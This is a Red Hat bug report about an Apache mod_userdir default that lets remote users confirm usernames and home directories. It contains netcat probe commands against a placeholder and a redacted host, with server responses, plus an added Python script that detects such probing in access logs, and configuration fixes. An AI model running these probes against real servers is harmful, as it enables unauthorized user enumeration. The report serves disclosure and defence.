Bug 20434 - remote user can verify valid username and get home directory for any user
Status: CLOSED CURRENTRELEASE
Product: Red Hat Linux
Classification: Retired
Component: apache
Version: 7.0
Platform: i386 Linux
Priority: medium
Severity: medium
Assigned To: Nalin Dahyabhai
QA Contact: Dale Lovelace
Keywords: Security
Reported: 2000-11-06 14:04 EST by P Jones
Modified: 2007-04-18 12:29 EDT
Doc Type: Bug Fix
Last Closed: 2001-09-27 23:40:34 EDT
Description P Jones 2000-11-06 14:04:38 EST
By default install, the 404 script will expand ~USER to the user's home directory if user exists. THUS
( sleep 5 ; echo GET ~root/notfound 1.0 ; echo ; sleep 5 ) | nc www.domain.com 80 
will return:

....
The requested URL /root/notfound was not found on this server.<P>
indicating that the user root does exist and has his home directory in /root, 
or... (for, say "nobody", instead of "root")
The requested URL //notfound was not found...
or for "nouser" (who doesn't exist), I get a 400 error (Bad request)

NOTE that all these requests are handled better if the request includes a '/' before the ~, as thus:
( sleep 5 ; echo GET /~root/notfound 1.0 ; echo ; sleep 5 ) | nc www.domain.com 80
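Added here as an example (it is not part of the bug report): a Python script that looks for the probing pattern described above in an Apache access log, grouping `~user` requests by client and separating the 404 (name resolved to a home directory) from the 400 (no such user) outcomes. It assumes common log format; the sample lines are constructed, modelled on the requests shown above.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache common log format (not taken from the bug report).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2001:03:36:23 +0000] "GET ~root/notfound 1.0" 404 295
10.0.0.5 - - [28/Sep/2001:03:36:40 +0000] "GET ~rsadft/notfound 1.0" 400 318
10.0.0.5 - - [28/Sep/2001:03:36:55 +0000] "GET ~nobody/notfound 1.0" 404 290
10.0.0.5 - - [28/Sep/2001:03:37:02 +0000] "GET ~bin/notfound 1.0" 404 294
192.0.2.9 - - [28/Sep/2001:03:40:00 +0000] "GET /index.html HTTP/1.0" 200 1532
192.0.2.9 - - [28/Sep/2001:03:40:05 +0000] "GET /~alice/ HTTP/1.0" 200 812
"""

# Common log format: client, ident, authuser, [timestamp], "request line", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3})')
# A request line whose URI is in mod_userdir form: ~user... or /~user...
TILDE_RE = re.compile(r'^\S+ /?~(?P<user>[^/\s]+)')


def parse_line(line):
    """Return (client_ip, request_line, status) or None if the line is not CLF."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return m.group("ip"), m.group("req"), int(m.group("status"))


def find_userdir_probes(log_text, threshold=3):
    """Group ~user requests by client and return clients that tried at least
    `threshold` distinct usernames.  A 400 answer means the name did not
    resolve ("rejected"); any other status means it did ("resolved")."""
    probes = defaultdict(lambda: {"resolved": set(), "rejected": set()})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, req, status = parsed
        m = TILDE_RE.match(req)
        if m is None:
            continue
        bucket = "rejected" if status == 400 else "resolved"
        probes[ip][bucket].add(m.group("user"))
    return {ip: b for ip, b in probes.items()
            if len(b["resolved"] | b["rejected"]) >= threshold}


if __name__ == "__main__":
    for ip, b in find_userdir_probes(SAMPLE_LOG).items():
        print(f"{ip}: resolved={sorted(b['resolved'])} rejected={sorted(b['rejected'])}")
```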
Comment 1 Arenas Belon, Carlo Marcelo 2000-11-25 22:03:49 EST
There are 2 possible solutions IMHO

add to <Directory /> 

  order deny,allow
  deny from all

which is a really good idea for a secure default configuration. and then all that
is shown is a "Forbidden" message no matter if the user exists or not ;)

or comment 

#UserDir public_html

and also (as the mod_userdir module is just wasting memory)

#LoadModule userdir_module      modules/mod_userdir.so
#AddModule mod_userdir.c

actually both can be done without taking any functionality as usually all the
directories on RedHat are created as 0700 and need to be at least 0555 for
UserDir to work ;)
Comment 2 R P Herrold 2001-09-27 23:40:29 EDT
This exploit was mentioned again last week on main bugtraq of Vuln-devel list at
SecurityFocus, and Red Hat's config file was held up as a bad example by name.

--------------------------

At least with a stock RH 7.1 install, the defect is still present (victim domain
elided):


[herrold@dell4 herrold]$ ( sleep 5 ; echo GET ~root/notfound 1.0 ; echo ; sleep 5 ) | nc aaa.bbb.net 80
HTTP/1.1 404 Not Found
Date: Fri, 28 Sep 2001 03:36:23 GMT
Server: Apache/1.3.19 (Unix)  (Red-Hat/Linux) PHP/4.0.4pl1 mod_perl/1.24_01
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /root/notfound was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.19 Server at aaa.bbb.net Port 80</ADDRESS>
</BODY></HTML>
[herrold@dell4 herrold]$ ( sleep 5 ; echo GET ~rsadft/notfound 1.0 ; echo ; sleep 5 ) | nc aaa.bbb.net 80
HTTP/1.1 400 Bad Request
Date: Fri, 28 Sep 2001 03:36:40 GMT
Server: Apache/1.3.19 (Unix)  (Red-Hat/Linux) PHP/4.0.4pl1 mod_perl/1.24_01
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Invalid URI in request GET ~rsadft/notfound 1.0<P>
<HR>
<ADDRESS>Apache/1.3.19 Server at aaa.bbb.net Port 80</ADDRESS>
</BODY></HTML>
[herrold@dell4 herrold]$
Comment 3 Joe Orton 2002-09-11 16:15:22 EDT
This was fixed in the default Apache configuration in Red Hat Linux 7.3, which 
does not disable mod_userdir by default.
Comment 4 Joe Orton 2002-09-11 16:16:21 EDT
... which does not *enable* userdir by default, of course, I meant.  Apologies
for the spam.
